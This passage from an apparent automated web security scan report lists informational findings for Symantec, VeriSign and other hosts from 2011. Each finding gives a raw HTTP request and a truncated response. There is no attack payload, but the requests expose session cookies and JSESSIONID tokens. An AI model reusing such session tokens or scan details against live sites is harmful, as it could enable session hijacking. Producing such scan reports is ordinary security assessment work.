s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:52 GMTContent-Type: text/html Content-Length: 615 Connection: keep-alive <html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.8.54</center> </bod...[SNIP]...
22.30. http://partnerlocator.symantec.com/public/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/search
Request
POST /public/search HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search Content-Length: 85 Cache-Control: max-age=0 Origin: http://partnerlocator.symantec.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Djavascript%2525253Arequired_country_with_submit%25252528document.select_country%2525252C%25252527Please%25252520select%25252520a%25252520country.%25252527%25252529%2525253B%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B locale=en-us&country=United+Arab+Emirates&country_name=United+Arab+Emirates+&_search=
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:58 GMTContent-Type: text/html Content-Length: 615 Connection: keep-alive <html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.8.54</center> </bod...[SNIP]...
22.31. https://partnernet.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://partnernet.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: partnernet.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:06 GMT Server: Apache/2.2.15 (Unix) Last-Modified: Thu, 12 May 2011 19:48:14 GMT ETag: "70c638-47-4a3197842db80" Accept-Ranges: bytes Content-Length: 71 Connection: closeContent-Type: text/html <meta http-equiv="refresh" content="0; URL=/Partnercontent/Login.jsp">
22.32. http://player.ooyala.com/info/primary/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/info/primary/
Request
GET /info/primary/ HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OKContent-Type: text/html Content-Length: 381 Date: Fri, 09 Sep 2011 21:25:47 GMT Connection: close Vary: Accept-Encoding LyG84k55cH2qqKsCKThF9pIijz6kuooWXzBwi9wecPfEPAb+op9VqIT30K4Omw9FS2j9ClUiAsNd8muh3VILcB/oegr3a9DNHzbEfr7bY7e6ft43EYvUZ6Z/M4aTleS1sueeKUT5r1E1J565p/d9dd+RujgJ9ulqu6caTPLzBBFWjbj7inLKstRg2gNeQtI6MOQvakLZ...[SNIP]...
22.33. https://policy3.responsys.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://policy3.responsys.net
Path:
/
Request
GET / HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:00 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "2ef9310-155-486ed8d030880" Accept-Ranges: bytes Content-Length: 341 Connection: closeContent-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Permission Policy</title> <meta http-equiv="Refresh" content="0; URL=./permission.htm" <meta http-equiv="Content-Ty...[SNIP]...
22.34. https://renewals.symantec.com/renewals/chat_norton.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/chat_norton.jsp
Request
GET /renewals/chat_norton.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Length: 1638Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN"> <head>...[SNIP]...
22.35. https://securitycenter.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE1WkhKCKMQP1p2JJzrZf2h3PXz1qghWLRzUhS1WUJUiNzxbzTT!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:41 GMT Content-length: 129Content-type: text/html Last-modified: Thu, 23 Dec 2004 19:39:49 GMT Etag: "81-41cb1f05" Accept-ranges: bytes <html> <head> <meta http-equiv="Refresh" content="0; url=https://www.verisign.com/products/site/"> </head> <body></body> </html>
22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/orderStatus
Request
GET /celp/enroll/orderStatus HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:32 GMT Content-length: 408Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Request
GET /celp/enroll/outsideSearch HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-length: 408Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.38. https://securitycenter.verisign.com/celp/enroll/retail
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/retail
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:17 GMT Content-length: 408Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.39. https://securitycenter.verisign.com/celp/enroll/upsell
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/upsell
Request
GET /celp/enroll/upsell HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:32 GMT Content-length: 408Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Set-Cookie: JSESSIONID=OqJ4o0r1eq0XdEuNa8cCA2iDyk4r5r7iuywwlssiJ0mmB13GoVxZ!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/TeaLeafTarget.html
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 Content-Length: 1103 X-TeaLeaf-Page-Objects: 0 Origin: https://trust-center.verisign.com X-TeaLeaf-Page-Img-Fail: 1 X-TeaLeaf-Page-Render: 123 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: undefined; INIT X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941 X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719 <ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" > ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:10 GMT Server: Apache Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-AliveContent-Type: text/html <html> <body> OK </body> </html>
22.41. http://www.verisign.ch/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
22.42. http://www.verisign.ch/assets/global/js/leftnav.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/global/js/leftnav.js
Request
GET /assets/global/js/leftnav.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/shared/js/jquery.url.packed.js
Request
GET /assets/shared/js/jquery.url.packed.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 1935Content-Type: text/html jQuery.url=function(){var segments={};var parsed={};var options={url:window.location,strictMode:false,key:["source","protocol","authority","userInfo","user","password","host","port","relative","path",...[SNIP]...
22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/shared/js/leftnav_new.js
Request
GET /assets/shared/js/leftnav_new.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
22.45. http://www.verisign.ch/corporate/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]...
22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
Request
GET /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7Content-Type: text/html Content-Length: 22346 //////////////////////////////////// //Main JS functions for verisign.com //////////////////////////////////// function findObj(n, d){ var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&pa...[SNIP]...
22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
Request
GET /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 3364Content-Type: text/html ///////////////////////////////////////////////////////////////////////////// // Function : vrsnNavMenuElements // Comments : /////////////////////////////////////////////////////////////////////////...[SNIP]...
22.48. http://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMTContent-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMTContent-Type: text/html Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Request
